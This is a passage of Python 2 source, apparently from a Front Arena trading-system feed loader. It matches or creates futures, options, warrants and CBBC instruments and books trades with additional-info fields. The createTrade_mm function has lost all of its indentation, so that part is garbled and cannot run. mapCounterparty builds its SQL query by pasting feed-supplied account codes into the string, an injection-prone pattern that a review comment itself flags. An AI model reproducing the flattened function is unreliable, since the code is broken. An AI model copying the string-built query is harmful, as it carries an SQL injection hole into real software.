                    ins_new_insid = createIndexFutureInstr(insCcy, insMic, insDesc, insLocalCode, insMaturity, insPointValue, insName, ins_underlying_insid, insULProdType, insUnderlying_mktId)
                if ins_new_insid != '':
                    trd_insid = ins_new_insid
                    new_arr_ins.append(ins_new_insid)
                    newIns = True
        else:
            # Existing future: refresh additional infos and BB ticker alias.
            acm_ins = acm.FInstrument[ins_insid]
            CreateInsAdditionalInfo(acm_ins.Name(), insMic, insDesc, insName, insLocalCode, insProdType, insUnderlying_mktId)
            #bb_ticker = formatBBTicker(insCcy, insProdType, insLocalCode, insMaturity, acm_ins.Underlying().Name(), acm_ins.ContractSize(), insULProdType)
            bb_ticker = formatBBTicker(insMic, insCcy, insProdType, insLocalCode, insMaturity, acm_ins.Underlying().Name(), acm_ins.ContractSize(), insULProdType)
            if bb_ticker != '':
                createInstrumentAlias(ins_insid, 'BB_TICKER', bb_ticker)
            trd_insid = ins_insid
            newIns = False
    elif insProdType == 'OPTION':
        # --- Options: index options from MSSD are matched on individual
        # attributes; all others on the local-code mapping. ---
        #print 'B'
        if insULProdType == 'INDEX':
            if fo_system == 'MSSD':
                ins_insid = getInstrumentByIndAttributes(insMic, insProdType, mssd_underlying, mssd_callput, mssd_exp_month, mssd_strike, mssd_pointval)
            else:
                ins_insid = getInstrumentByMapping(insLocalCode, insMic)
        else:
            ins_insid = getInstrumentByMapping(insLocalCode, insMic)
        #print 'C', ins_insid, insULProdType
        if ins_insid == '':
            # get Underlying
            ins_underlying_insid = getInstrumentByMapping(insUlLocalCode, insULMic)
            if ins_underlying_insid == '':
                if insULProdType == 'STOCK':
                    ins_underlying_insid = createStockInstr(insULCcy, insULMic, insULDesc, insULName, insUlLocalCode)
                elif insULProdType == 'INDEX':
                    # Index underlyings are not auto-created (creation disabled).
                    ins_underlying_insid = ''
                    #ins_underlying_insid = createEquityIndexInstr(insULCcy, insULMic, insULDesc, insULName, insUlLocalCode)
                if ins_underlying_insid != '':
                    new_arr_ins.append(ins_underlying_insid)
            else:
                # Existing underlying: refresh its additional infos and alias.
                acm_ins = acm.FInstrument[ins_underlying_insid]
                CreateInsAdditionalInfo(acm_ins.Name(), insULMic, insULDesc, insULName, insUlLocalCode, insULProdType, '')
                #ul_bb_ticker = formatBBTicker(insULCcy, insULProdType, insUlLocalCode)
                ul_bb_ticker = formatBBTicker(insULMic, insULCcy, insULProdType, insUlLocalCode)
                if ul_bb_ticker != '':
                    createInstrumentAlias(ins_underlying_insid, 'BB_TICKER', ul_bb_ticker)
            # Create Option
            if ins_underlying_insid != '':
                ins_new_insid = ''
                if insULProdType == 'STOCK':
                    #print 'G'
                    ins_new_insid = createStockOptionInstr(insMaturity, insCcy, insPointValue, insDeliveryType, insOptionType, insExecType, insStrike, insMic, insDesc, insLocalCode, insName, insULProdType, ins_underlying_insid, insUnderlying_mktId)
                    #print 'H'
                elif insULProdType == 'INDEX':
                    #print 'D'
                    ins_new_insid = createIndexOptionInstr(insMaturity, insCcy, insPointValue, insDeliveryType, insOptionType, insExecType, insStrike, insMic, insDesc, insLocalCode, insName, insULProdType, ins_underlying_insid, insUnderlying_mktId)
                    #print 'E'
                if ins_new_insid != '':
                    trd_insid = ins_new_insid
                    new_arr_ins.append(ins_new_insid)
                    newIns = True
        else:
            # Existing option: refresh additional infos and BB ticker alias.
            acm_ins = acm.FInstrument[ins_insid]
            CreateInsAdditionalInfo(acm_ins.Name(), insMic, insDesc, insName, insLocalCode, insProdType, insUnderlying_mktId)
            #bb_ticker = formatBBTicker(insCcy, insProdType, insLocalCode, insMaturity, acm_ins.Underlying().Name(), acm_ins.ContractSize(), insULProdType, insOptionType, insStrike)
            bb_ticker = formatBBTicker(insMic, insCcy, insProdType, insLocalCode, insMaturity, acm_ins.Underlying().Name(), acm_ins.ContractSize(), insULProdType, insOptionType, insStrike)
            if bb_ticker != '':
                createInstrumentAlias(ins_insid, 'BB_TICKER', bb_ticker)
            trd_insid = ins_insid
            newIns = False
    elif insProdType == 'WARRANT':
        # --- Warrants: create underlying first, then the warrant. ---
        #print 'F'
        ins_insid = getInstrumentByMapping(insLocalCode, insMic)
        if ins_insid == '':
            #print 'G'
            ins_underlying_insid = getInstrumentByMapping(insUlLocalCode, insULMic)
            #print 'H', ins_underlying_insid
            if ins_underlying_insid == '':
                #print 'I'
                # Create Underlying Stock
                if insULProdType == 'STOCK':
                    ins_underlying_insid = createStockInstr(insULCcy, insULMic, insULDesc, insULName, insUlLocalCode)
                elif insULProdType == 'INDEX':
                    # Index underlyings are not auto-created (creation disabled).
                    ins_underlying_insid = ''
                    #ins_underlying_insid = createEquityIndexInstr(insULCcy, insULMic, insULDesc, insULName, insUlLocalCode)
                if ins_underlying_insid != '':
                    new_arr_ins.append(ins_underlying_insid)
            else:
                #print 'J'
                acm_ins = acm.FInstrument[ins_underlying_insid]
                #print acm_ins.Name(), insULMic, insULDesc, insULName, insUlLocalCode, insULProdType
                CreateInsAdditionalInfo(acm_ins.Name(), insULMic, insULDesc, insULName, insUlLocalCode, insULProdType, '')
                #print 'K'
                #ul_bb_ticker = formatBBTicker(insULCcy, insULProdType, insUlLocalCode)
                ul_bb_ticker = formatBBTicker(insULMic, insULCcy, insULProdType, insUlLocalCode)
                #print 'L'
                if ul_bb_ticker != '':
                    createInstrumentAlias(ins_underlying_insid, 'BB_TICKER', ul_bb_ticker)
            # Create Warrant
            if ins_underlying_insid != '':
                ins_new_insid = createWarrantInstr(insMaturity, insCcy, insPointValue, insDeliveryType, insOptionType, \
                                insExecType, insStrike, insMic, insDesc, insLocalCode, insIssueSize, insIssueDate, \
                                issuer_ptyid, insName, ins_underlying_insid, warrantParity)
                if ins_new_insid != '':
                    trd_insid = ins_new_insid
                    new_arr_ins.append(ins_new_insid)
                    newIns = True
        else:
            # Existing warrant: refresh infos, re-sync issue size, alias.
            acm_ins = acm.FInstrument[ins_insid]
            CreateInsAdditionalInfo(acm_ins.Name(), insMic, insDesc, insName, insLocalCode, insProdType, '')
            UpdateWarrantInfo(acm_ins.Name(), insIssueSize)
            #bb_ticker = formatBBTicker(insCcy, insProdType, insLocalCode)
            bb_ticker = formatBBTicker(insMic, insCcy, insProdType, insLocalCode)
            if bb_ticker != '':
                createInstrumentAlias(ins_insid, 'BB_TICKER', bb_ticker)
            trd_insid = ins_insid
            newIns = False
    elif insProdType == 'CBBC':
        # --- Callable Bull/Bear Contracts: same pattern as warrants. ---
        ins_insid = getInstrumentByMapping(insLocalCode, insMic)
        if ins_insid == '':
            ins_underlying_insid = getInstrumentByMapping(insUlLocalCode, insULMic)
            if ins_underlying_insid == '':
                # Create Underlying Stock
                if insULProdType == 'STOCK':
                    ins_underlying_insid = createStockInstr(insULCcy, insULMic, insULDesc, insULName, insUlLocalCode)
                elif insULProdType == 'INDEX':
                    # Index underlyings are not auto-created (creation disabled).
                    ins_underlying_insid = ''
                    #ins_underlying_insid = createEquityIndexInstr(insULCcy, insULMic, insULDesc, insULName, insUlLocalCode)
                if ins_underlying_insid != '':
                    new_arr_ins.append(ins_underlying_insid)
            else:
                acm_ins = acm.FInstrument[ins_underlying_insid]
                CreateInsAdditionalInfo(acm_ins.Name(), insULMic, insULDesc, insULName, insUlLocalCode, insULProdType, '')
                #ul_bb_ticker = formatBBTicker(insULCcy, insULProdType, insUlLocalCode)
                ul_bb_ticker = formatBBTicker(insULMic, insULCcy, insULProdType, insUlLocalCode)
                if ul_bb_ticker != '':
                    createInstrumentAlias(ins_underlying_insid, 'BB_TICKER', ul_bb_ticker)
            # Create CBBC
            if ins_underlying_insid != '':
                ins_new_insid = createCBBCInstr(insMaturity, insCcy, insPointValue, insDeliveryType, insOptionType, \
                                insExecType, insStrike, insMic, insDesc, insLocalCode, insBullBear, insBarrier, \
                                insIssueSize, insIssueDate, insBarrierType, issuer_ptyid, insName, ins_underlying_insid, \
                                warrantParity)
                if ins_new_insid != '':
                    trd_insid = ins_new_insid
                    new_arr_ins.append(ins_new_insid)
                    newIns = True
        else:
            # Existing CBBC: refresh infos, re-sync issue size, alias.
            acm_ins = acm.FInstrument[ins_insid]
            CreateInsAdditionalInfo(acm_ins.Name(), insMic, insDesc, insName, insLocalCode, insProdType, '')
            UpdateWarrantInfo(acm_ins.Name(), insIssueSize)
            #bb_ticker = formatBBTicker(insCcy, insProdType, insLocalCode)
            bb_ticker = formatBBTicker(insMic, insCcy, insProdType, insLocalCode)
            if bb_ticker != '':
                createInstrumentAlias(ins_insid, 'BB_TICKER', bb_ticker)
            trd_insid = ins_insid
            newIns = False
    return trd_insid, newIns
def UpdateWarrantInfo(insid, issueSize):
    """Re-sync the TotalIssued field of an existing warrant/CBBC.

    issueSize arrives from the feed as a string ('' when absent); it is
    converted to float before comparing and writing. Does nothing when
    issueSize is empty/None.
    """
    if issueSize is None or issueSize == '':
        return
    # BUGFIX: the original compared the numeric TotalIssued() against the raw
    # string, so the guard always fired and a string was written back; convert
    # once and only commit when the value actually changed.
    issued = float(issueSize)
    acm_ins = acm.FInstrument[insid]
    if acm_ins.TotalIssued() != issued:
        acm_ins_c = acm_ins.Clone()
        acm_ins_c.TotalIssued(issued)
        acm_ins.Apply(acm_ins_c)
        acm_ins.Commit()
def createTrade(asofdate, trd_insid, tradeId, way, qty, price, trdCcy, DEFAULT_PF, DEFAULT_CPTY, \
                DEFAULT_BKR, DEFAULT_ACQ, DEFAULT_STATUS, DEFAULT_TRADER, channel, \
                trdAcquirer, trdCounterparty, trdPortfolio, trd_td, trd_vd, mss_acc_id, trd_ae_aces_grp_cde, \
                fo_userid, timestamp, errdict):
    """Book an AEL trade on the resolved instrument.

    Falls back to the DEFAULT_* values when portfolio / counterparty /
    acquirer are not supplied. Trade time comes from `timestamp`
    (Horizon, 'YYYYMMDD?HHMMSS' layout) when trd_td is empty, otherwise
    from trd_td (MSS). Value day defaults to the instrument's spot offset
    over its currency calendar when trd_vd is empty.

    Returns (trdnbr, 'Success') on commit, or (-1, 'Fail') after recording
    each missing/invalid field into errdict via addDictError.
    """
    #return 1234, 'Success'
    trdnbr = -1
    tradeSituation = 'Fail'
    #print 'trdPortfolio', trdPortfolio
    #print 'trdCounterparty', trdCounterparty
    #print 'trdAcquirer', trdAcquirer
    # Portfolio
    if trdPortfolio == '':
        pf = ael.Portfolio[DEFAULT_PF]
        #print 'louis1', DEFAULT_PF, pf
        if pf != None:
            prfid = pf.prfid.strip()
        else:
            prfid = ''
    else:
        prfid = trdPortfolio
    #print 'prfid100', prfid
    #return false
    # Counterparty
    if trdCounterparty == '':
        ptyid = getCounterparty(DEFAULT_CPTY)
    else:
        ptyid = trdCounterparty
    # Broker
    #broker_ptyid = getBroker(DEFAULT_BKR)
    # Acquirer
    if trdAcquirer == '':
        acq_ptyid = getAcquirer(DEFAULT_ACQ)
    else:
        acq_ptyid = trdAcquirer
    # B/S
    if way.upper() in ('B', 'S'):
        buysell = way.upper()
    else:
        buysell = ''
    # Instrument
    ael_ins = ael.Instrument[trd_insid]
    if ael_ins != None:
        insid = ael_ins.insid.strip()
    else:
        insid = ''
    # Trade currency must itself exist as a currency instrument.
    curr = ael.Instrument[trdCcy]
    if curr != None:
        curr_insid = curr.insid.strip()
    else:
        curr_insid = ''
    #Trader
    traderId = DEFAULT_TRADER
    #print 'louis111', insid, prfid, curr_insid, ptyid, acq_ptyid, buysell, traderId
    # Only book when every mandatory reference resolved; otherwise report below.
    if insid != '' and prfid != '' and curr_insid != '' and ptyid != '' and acq_ptyid != '' \
        and buysell != '' and traderId != '':
        ael_ins = ael.Instrument[insid]
        ael_trd = ael.Trade.new(ael_ins)
        ael_trd.prfnbr = ael.Portfolio[prfid]
        ael_trd.acquirer_ptynbr = ael.Party[acq_ptyid]
        ael_trd.counterparty_ptynbr = ael.Party[ptyid]
        #ael_trd.broker_ptynbr = ael.Party[broker_ptyid]
        ael_trd.curr = ael.Instrument[curr_insid]
        if trd_td == '':
            # Horizon
            # Parse the fixed-width feed timestamp (date, skip separator, time).
            #td = ael.date(asofdate).to_ymd()
            yy = timestamp[0:4]
            mm = timestamp[4:6]
            dd = timestamp[6:8]
            hh = timestamp[9:11]
            mi = timestamp[11:13]
            ss = timestamp[13:15]
            td_tm = datetime.datetime(int(yy), int(mm), int(dd), int(hh), int(mi), int(ss))
        else:
            # MSS
            td = ael.date(trd_td).to_ymd()
            #print td
            td_tm = datetime.datetime(td[0], td[1], td[2], 0, 0, 0)
        ael_trd.time = int(time.mktime(td_tm.timetuple()))
        # use instrument currency calendar to skip holiday
        if trd_vd == '':
            if trd_td == '':
                ael_trd.value_day = ael.date(asofdate).add_banking_day(ael_ins.curr, ael_ins.spot_banking_days_offset)
            else:
                ael_trd.value_day = ael.date(trd_td).add_banking_day(ael_ins.curr, ael_ins.spot_banking_days_offset)
        else:
            ael_trd.value_day = ael.date(trd_vd)
        ael_trd.acquire_day = ael_trd.value_day
        # Sign of quantity encodes buy (+) vs sell (-).
        if way == 'B':
            ael_trd.quantity = abs(float(qty))
        else:
            ael_trd.quantity = -abs(float(qty))
        ael_trd.price = float(price)
        # Premium = price converted per the instrument's quotation * signed qty.
        ael_trd.premium = quoteTo(ael_ins, ael_trd.acquire_day, ael_ins.quote_type, ael_trd.price) * ael_trd.quantity
        ael_trd.status = DEFAULT_STATUS
        ael_trd.type = 'Normal'
        # FO trade id may exceed the 63-char addinfo limit; split across three.
        tradeId_f = formatFOTradeId(tradeId, channel)
        tradeId_1 = tradeId_f[0:63]
        tradeId_2 = tradeId_f[63:126]
        tradeId_3 = tradeId_f[126:189]
        if tradeId_1.strip() != '':
            FOTradeIdAddinfo1 = ael.AdditionalInfo.new(ael_trd)
            FOTradeIdAddinfo1.addinf_specnbr = 'FO Trade Id_1'
            FOTradeIdAddinfo1.value = tradeId_1
        if tradeId_2.strip() != '':
            FOTradeIdAddinfo2 = ael.AdditionalInfo.new(ael_trd)
            FOTradeIdAddinfo2.addinf_specnbr = 'FO Trade Id_2'
            FOTradeIdAddinfo2.value = tradeId_2
        if tradeId_3.strip() != '':
            FOTradeIdAddinfo3 = ael.AdditionalInfo.new(ael_trd)
            FOTradeIdAddinfo3.addinf_specnbr = 'FO Trade Id_3'
            FOTradeIdAddinfo3.value = tradeId_3
        FOSystemAddinfo = ael.AdditionalInfo.new(ael_trd)
        FOSystemAddinfo.addinf_specnbr = 'Trade Source'
        FOSystemAddinfo.value = channel
        if mss_acc_id.strip() != '':
            MSSACCAddinfo = ael.AdditionalInfo.new(ael_trd)
            MSSACCAddinfo.addinf_specnbr = 'MSS_Account'
            MSSACCAddinfo.value = mss_acc_id
        if channel == 'Horizon':
            # Horizon feeds derive the MSS account from portfolio + instrument.
            mss_acc_id = mapMssAccCode(prfid, ael_ins.insid.strip())
            #print 'Z1', mss_acc_id
            if mss_acc_id.strip() != '':
                MSSACCAddinfo = ael.AdditionalInfo.new(ael_trd)
                MSSACCAddinfo.addinf_specnbr = 'MSS_Account'
                MSSACCAddinfo.value = mss_acc_id
        if trd_ae_aces_grp_cde.strip() != '':
            HorizonPfAddinfo = ael.AdditionalInfo.new(ael_trd)
            HorizonPfAddinfo.addinf_specnbr = 'Horizon Portfolio'
            HorizonPfAddinfo.value = trd_ae_aces_grp_cde
        '''
        if channel == 'Horizon':
            HorizonPfAddinfo = ael.AdditionalInfo.new(ael_trd)
            HorizonPfAddinfo.addinf_specnbr = 'Horizon Portfolio'
            HorizonPfAddinfo.value = trd_ae_aces_grp_cde
        else:
            AEACESAddinfo = ael.AdditionalInfo.new(ael_trd)
            AEACESAddinfo.addinf_specnbr = 'AE_Aces_Code'
            AEACESAddinfo.value = trd_ae_aces_grp_cde
        '''
        if fo_userid.strip() != '':
            FOUserIdAddinfo = ael.AdditionalInfo.new(ael_trd)
            FOUserIdAddinfo.addinf_specnbr = 'Horizon User Id'
            FOUserIdAddinfo.value = fo_userid
        ael_trd.trader_usrnbr = ael.User[traderId]
        ael_trd.commit()
        ael.poll()
        trdnbr = ael_trd.trdnbr
        tradeSituation = 'Success'
    else:
        # Report every missing reference individually so one bad trade
        # surfaces all of its problems at once.
        if insid == '':
            errdict = addDictError('Instrument', 'Invalid instrument of trade %s' % (tradeId), 'Portfolio=%s, CCY=%s, Counterparty=%s, Acquirer=%s, Way=%s, TraderId=%s, TradeId=%s' % (prfid, curr_insid, ptyid, acq_ptyid, way, traderId, tradeId), errdict)
        if prfid == '':
            errdict = addDictError('Portfolio', 'Invalid portfolio of trade %s' % (tradeId), 'Portfolio=%s, CCY=%s, Counterparty=%s, Acquirer=%s, Way=%s, TraderId=%s, TradeId=%s' % (prfid, curr_insid, ptyid, acq_ptyid, way, traderId, tradeId), errdict)
        if ptyid == '':
            errdict = addDictError('Counterparty', 'Invalid counterparty of trade %s' % (tradeId), 'Portfolio=%s, CCY=%s, Counterparty=%s, Acquirer=%s, Way=%s, TraderId=%s, TradeId=%s' % (prfid, curr_insid, ptyid, acq_ptyid, way, traderId, tradeId), errdict)
        if curr_insid == '':
            errdict = addDictError('Trade Ccy', 'Invalid trade currency of trade %s' % (tradeId), 'Portfolio=%s, CCY=%s, Counterparty=%s, Acquirer=%s, Way=%s, TraderId=%s, TradeId=%s' % (prfid, curr_insid, ptyid, acq_ptyid, way, traderId, tradeId), errdict)
        if acq_ptyid == '':
            errdict = addDictError('Acquirer', 'Invalid acquirer of trade %s' % (tradeId), 'Portfolio=%s, CCY=%s, Counterparty=%s, Acquirer=%s, Way=%s, TraderId=%s, TradeId=%s' % (prfid, curr_insid, ptyid, acq_ptyid, way, traderId, tradeId), errdict)
        if buysell == '':
            errdict = addDictError('BuySell', 'Invalid buy/sell of trade %s' % (tradeId), 'Portfolio=%s, CCY=%s, Counterparty=%s, Acquirer=%s, Way=%s, TraderId=%s, TradeId=%s' % (prfid, curr_insid, ptyid, acq_ptyid, way, traderId, tradeId), errdict)
        if traderId == '':
            errdict = addDictError('Trader', 'Invalid trader of trade %s' % (tradeId), 'Portfolio=%s, CCY=%s, Counterparty=%s, Acquirer=%s, Way=%s, TraderId=%s, TradeId=%s' % (prfid, curr_insid, ptyid, acq_ptyid, way, traderId, tradeId), errdict)
    return trdnbr, tradeSituation
def createTrade_mm(asofdate, trd_insid, tradeId, way, qty, price, trdCcy, DEFAULT_PF, DEFAULT_CPTY, \
DEFAULT_BKR, DEFAULT_ACQ, DEFAULT_STATUS, DEFAULT_TRADER, channel, \
trdAcquirer, trdCounterparty, trdPortfolio, trd_td, trd_vd, mss_acc_id, trd_ae_aces_grp_cde, \
fo_userid, timestamp, market_making, short_sell, short_sell_mssacc, errdict):
trdnbr = -1
tradeSituation = 'Fail'
short_sell = short_sell.upper()
print short_sell, 'short_sell'
bool_short_sell = IsShortSellTrade(short_sell)
#print 'trdPortfolio', trdPortfolio
#print 'trdCounterparty', trdCounterparty
#print 'trdAcquirer', trdAcquirer
# Portfolio
if trdPortfolio == '':
pf = ael.Portfolio[DEFAULT_PF]
if pf != None:
prfid = pf.prfid.strip()
else:
prfid = ''
else:
prfid = trdPortfolio
# Counterparty
if trdCounterparty == '':
ptyid = getCounterparty(DEFAULT_CPTY)
else:
ptyid = trdCounterparty
# Broker
#broker_ptyid = getBroker(DEFAULT_BKR)
# Acquirer
if trdAcquirer == '':
acq_ptyid = getAcquirer(DEFAULT_ACQ)
else:
acq_ptyid = trdAcquirer
# B/S
if way.upper() in ('B', 'S'):
buysell = way.upper()
else:
buysell = ''
# Instrument
ael_ins = ael.Instrument[trd_insid]
if ael_ins != None:
insid = ael_ins.insid.strip()
else:
insid = ''
curr = ael.Instrument[trdCcy]
if curr != None:
curr_insid = curr.insid.strip()
else:
curr_insid = ''
#Trader
traderId = DEFAULT_TRADER
#print 'louis111', insid, prfid, curr_insid, ptyid, acq_ptyid, buysell, traderId
if insid != '' and prfid != '' and curr_insid != '' and ptyid != '' and acq_ptyid != '' \
and buysell != '' and traderId != '':
ael_ins = ael.Instrument[insid]
ael_trd = ael.Trade.new(ael_ins)
ael_trd.prfnbr = ael.Portfolio[prfid]
ael_trd.acquirer_ptynbr = ael.Party[acq_ptyid]
ael_trd.counterparty_ptynbr = ael.Party[ptyid]
ael_trd.curr = ael.Instrument[curr_insid]
if trd_td == '':
# Horizon
yy = timestamp[0:4]
mm = timestamp[4:6]
dd = timestamp[6:8]
hh = timestamp[9:11]
mi = timestamp[11:13]
ss = timestamp[13:15]
td_tm = datetime.datetime(int(yy), int(mm), int(dd), int(hh), int(mi), int(ss))
else:
# MSS
td = ael.date(trd_td).to_ymd()
#print td
td_tm = datetime.datetime(td[0], td[1], td[2], 0, 0, 0)
#print td_tm
ael_trd.time = int(time.mktime(td_tm.timetuple()))
# use instrument currency calendar to skip holiday
#print 'time', ael_trd.time
if trd_vd == '':
if trd_td == '':
ael_trd.value_day = ael.date(asofdate).add_banking_day(ael_ins.curr, ael_ins.spot_banking_days_offset)
else:
ael_trd.value_day = ael.date(trd_td).add_banking_day(ael_ins.curr, ael_ins.spot_banking_days_offset)
else:
ael_trd.value_day = ael.date(trd_vd)
#print 'value_day', ael_trd.value_day
ael_trd.acquire_day = ael_trd.value_day
if way == 'B':
ael_trd.quantity = abs(float(qty))
else:
ael_trd.quantity = -abs(float(qty))
ael_trd.price = float(price)
ael_trd.premium = quoteTo(ael_ins, ael_trd.acquire_day, ael_ins.quote_type, ael_trd.price) * ael_trd.quantity
ael_trd.status = DEFAULT_STATUS
ael_trd.type = 'Normal'
tradeId_f = formatFOTradeId(tradeId, channel)
tradeId_1 = tradeId_f[0:63]
tradeId_2 = tradeId_f[63:126]
tradeId_3 = tradeId_f[126:189]
if tradeId_1.strip() != '':
FOTradeIdAddinfo1 = ael.AdditionalInfo.new(ael_trd)
FOTradeIdAddinfo1.addinf_specnbr = 'FO Trade Id_1'
FOTradeIdAddinfo1.value = tradeId_1
if tradeId_2.strip() != '':
FOTradeIdAddinfo2 = ael.AdditionalInfo.new(ael_trd)
FOTradeIdAddinfo2.addinf_specnbr = 'FO Trade Id_2'
FOTradeIdAddinfo2.value = tradeId_2
if tradeId_3.strip() != '':
FOTradeIdAddinfo3 = ael.AdditionalInfo.new(ael_trd)
FOTradeIdAddinfo3.addinf_specnbr = 'FO Trade Id_3'
FOTradeIdAddinfo3.value = tradeId_3
FOSystemAddinfo = ael.AdditionalInfo.new(ael_trd)
FOSystemAddinfo.addinf_specnbr = 'Trade Source'
FOSystemAddinfo.value = channel
if mss_acc_id.strip() != '':
MSSACCAddinfo = ael.AdditionalInfo.new(ael_trd)
MSSACCAddinfo.addinf_specnbr = 'MSS_Account'
MSSACCAddinfo.value = mss_acc_id
print channel, 'channel'
if channel == 'Horizon':
mss_acc_id = mapMssAccCode_withshortsell(prfid, ael_ins.insid.strip(), short_sell)
if mss_acc_id.strip() != '':
MSSACCAddinfo = ael.AdditionalInfo.new(ael_trd)
MSSACCAddinfo.addinf_specnbr = 'MSS_Account'
#if short_sell in ('SHORT', 'MARKET_MAKER'):
'''
if bool_short_sell:
MSSACCAddinfo.value = short_sell_mssacc
else:
MSSACCAddinfo.value = mss_acc_id
'''
MSSACCAddinfo.value = mss_acc_id
else:
#if short_sell in ('SHORT', 'MARKET_MAKER'):
if bool_short_sell:
MSSACCAddinfo = ael.AdditionalInfo.new(ael_trd)
MSSACCAddinfo.addinf_specnbr = 'MSS_Account'
MSSACCAddinfo.value = short_sell_mssacc
if trd_ae_aces_grp_cde.strip() != '':
HorizonPfAddinfo = ael.AdditionalInfo.new(ael_trd)
HorizonPfAddinfo.addinf_specnbr = 'Horizon Portfolio'
HorizonPfAddinfo.value = trd_ae_aces_grp_cde
'''
if channel == 'Horizon':
HorizonPfAddinfo = ael.AdditionalInfo.new(ael_trd)
HorizonPfAddinfo.addinf_specnbr = 'Horizon Portfolio'
HorizonPfAddinfo.value = trd_ae_aces_grp_cde
else:
AEACESAddinfo = ael.AdditionalInfo.new(ael_trd)
AEACESAddinfo.addinf_specnbr = 'AE_Aces_Code'
AEACESAddinfo.value = trd_ae_aces_grp_cde
'''
if fo_userid.strip() != '':
FOUserIdAddinfo = ael.AdditionalInfo.new(ael_trd)
FOUserIdAddinfo.addinf_specnbr = 'Horizon User Id'
FOUserIdAddinfo.value = fo_userid
if market_making.strip() == 'MMM':
MMAddinfo = ael.AdditionalInfo.new(ael_trd)
MMAddinfo.addinf_specnbr = 'Market Making'
MMAddinfo.value = 'Yes'
#if short_sell in ('SHORT', 'MARKET_MAKER'):
if bool_short_sell:
ShortSellAddinfo = ael.AdditionalInfo.new(ael_trd)
ShortSellAddinfo.addinf_specnbr = 'Short Sell'
ShortSellAddinfo.value = 'Yes'
ael_trd.trader_usrnbr = ael.User[traderId]
ael_trd.commit()
ael.poll()
trdnbr = ael_trd.trdnbr
tradeSituation = 'Success'
else:
if insid == '':
errdict = addDictError('Instrument', 'Invalid instrument of trade %s' % (tradeId), 'Portfolio=%s, CCY=%s, Counterparty=%s, Acquirer=%s, Way=%s, TraderId=%s, TradeId=%s' % (prfid, curr_insid, ptyid, acq_ptyid, way, traderId, tradeId), errdict)
if prfid == '':
errdict = addDictError('Portfolio', 'Invalid portfolio of trade %s' % (tradeId), 'Portfolio=%s, CCY=%s, Counterparty=%s, Acquirer=%s, Way=%s, TraderId=%s, TradeId=%s' % (prfid, curr_insid, ptyid, acq_ptyid, way, traderId, tradeId), errdict)
if ptyid == '':
errdict = addDictError('Counterparty', 'Invalid counterparty of trade %s' % (tradeId), 'Portfolio=%s, CCY=%s, Counterparty=%s, Acquirer=%s, Way=%s, TraderId=%s, TradeId=%s' % (prfid, curr_insid, ptyid, acq_ptyid, way, traderId, tradeId), errdict)
if curr_insid == '':
errdict = addDictError('Trade Ccy', 'Invalid trade currency of trade %s' % (tradeId), 'Portfolio=%s, CCY=%s, Counterparty=%s, Acquirer=%s, Way=%s, TraderId=%s, TradeId=%s' % (prfid, curr_insid, ptyid, acq_ptyid, way, traderId, tradeId), errdict)
if acq_ptyid == '':
errdict = addDictError('Acquirer', 'Invalid acquirer of trade %s' % (tradeId), 'Portfolio=%s, CCY=%s, Counterparty=%s, Acquirer=%s, Way=%s, TraderId=%s, TradeId=%s' % (prfid, curr_insid, ptyid, acq_ptyid, way, traderId, tradeId), errdict)
if buysell == '':
errdict = addDictError('BuySell', 'Invalid buy/sell of trade %s' % (tradeId), 'Portfolio=%s, CCY=%s, Counterparty=%s, Acquirer=%s, Way=%s, TraderId=%s, TradeId=%s' % (prfid, curr_insid, ptyid, acq_ptyid, way, traderId, tradeId), errdict)
if traderId == '':
errdict = addDictError('Trader', 'Invalid trader of trade %s' % (tradeId), 'Portfolio=%s, CCY=%s, Counterparty=%s, Acquirer=%s, Way=%s, TraderId=%s, TradeId=%s' % (prfid, curr_insid, ptyid, acq_ptyid, way, traderId, tradeId), errdict)
return trdnbr, tradeSituation
#: Fixed emission order of the validation-error categories in errdict.
_VALIDATION_ERR_KEYS = ('invalidIns', 'invalidParty', 'invalidPf',
                        'invalidTrdCcy', 'invalidAcquirer', 'invalidBroker')

def _append_err_category(errmsg, category):
    """Append one error category to *errmsg* and return the result.

    *category* is a pair (headers, bodies): for each entry the stripped
    header is appended, followed by each '|'-separated body part on its
    own tab-indented line.  Indexing (not zip) is kept so a bodies list
    shorter than headers raises IndexError, exactly like the original.
    """
    headers, bodies = category[0], category[1]
    for i in range(len(headers)):
        errmsg = errmsg + headers[i].strip()
        for part in bodies[i].split('|'):
            errmsg = errmsg + '\n\t' + part
    return errmsg

def LoopValidationErrMsg(errdict):
    """Build a human-readable validation error message from *errdict*.

    Each key in _VALIDATION_ERR_KEYS maps to ([headers], [bodies]); the
    categories are rendered in that fixed order.  Returns '' when every
    category is empty.
    """
    errmsg = ''
    for key in _VALIDATION_ERR_KEYS:
        errmsg = _append_err_category(errmsg, errdict[key])
        # Preserved behaviour: a blank-line separator is appended after
        # EVERY category once the message is non-empty, even when that
        # particular category contributed nothing.
        if errmsg != '':
            errmsg = errmsg + '\n\n'
    return errmsg
def mapCounterparty(acc, addinfo_fieldname):
    """Look up the FA party id whose additional-info field matches *acc*.

    The additional-info value may hold a comma-separated list of account
    codes, hence the three-way match (exact, leading 'acc,%', trailing
    '%,acc').  Returns '' when no party matches; when several match, the
    last row returned by the query wins.
    NOTE(review): *acc* is interpolated straight into the SQL string -
    assumes feed-supplied codes never contain quotes; confirm upstream.
    """
    strSql = """select p.ptyid
            from party p, additionalinfo a, additionalinfospec s
            where p.ptynbr = a.recaddr
            and a.addinf_specnbr = s.specnbr
            and s.field_name = '%s'
            and s.rec_type = 'Party'
            and (a.value = '%s' or a.value like '%s' or a.value like '%s')""" % (addinfo_fieldname, acc, acc+',%', '%,'+acc)
    print strSql
    rs = ael.asql(strSql)
    ptyid = ''
    # ael.asql returns (column names, list of result tables).
    columns, buf = rs
    for table in buf:
        for row in table:
            ptyid = row[0]
    return ptyid
# NOTE(review): disabled legacy implementation, superseded by the
# None-safe mapMssAccCode() defined below; kept for reference only.
'''
def mapMssAccCode(prfid, insid):
    acm_pf = acm.FPhysicalPortfolio[prfid]
    acm_ins = acm.FInstrument[insid]
    if acm_pf != None and acm_ins != None:
        if acm_ins.Otc() == False:
            if acm_ins.InsType() in ('Stock', 'Warrant'):
                return acm_pf.AdditionalInfo().MSSACC_STOCK().strip()
            elif acm_ins.InsType() == 'Future/Forward':
                return acm_pf.AdditionalInfo().MSSACC_FUTURE_OPT().strip()
            elif acm_ins.InsType() == 'Option':
                if acm_ins.Underlying().InsType() == 'Stock':
                    return acm_pf.AdditionalInfo().MSSACC_STOCK_OPT().strip()
                elif acm_ins.Underlying().InsType() == 'EquityIndex':
                    return acm_pf.AdditionalInfo().MSSACC_FUTURE_OPT().strip()
                else:
                    return ""
            else:
                return ""
        else:
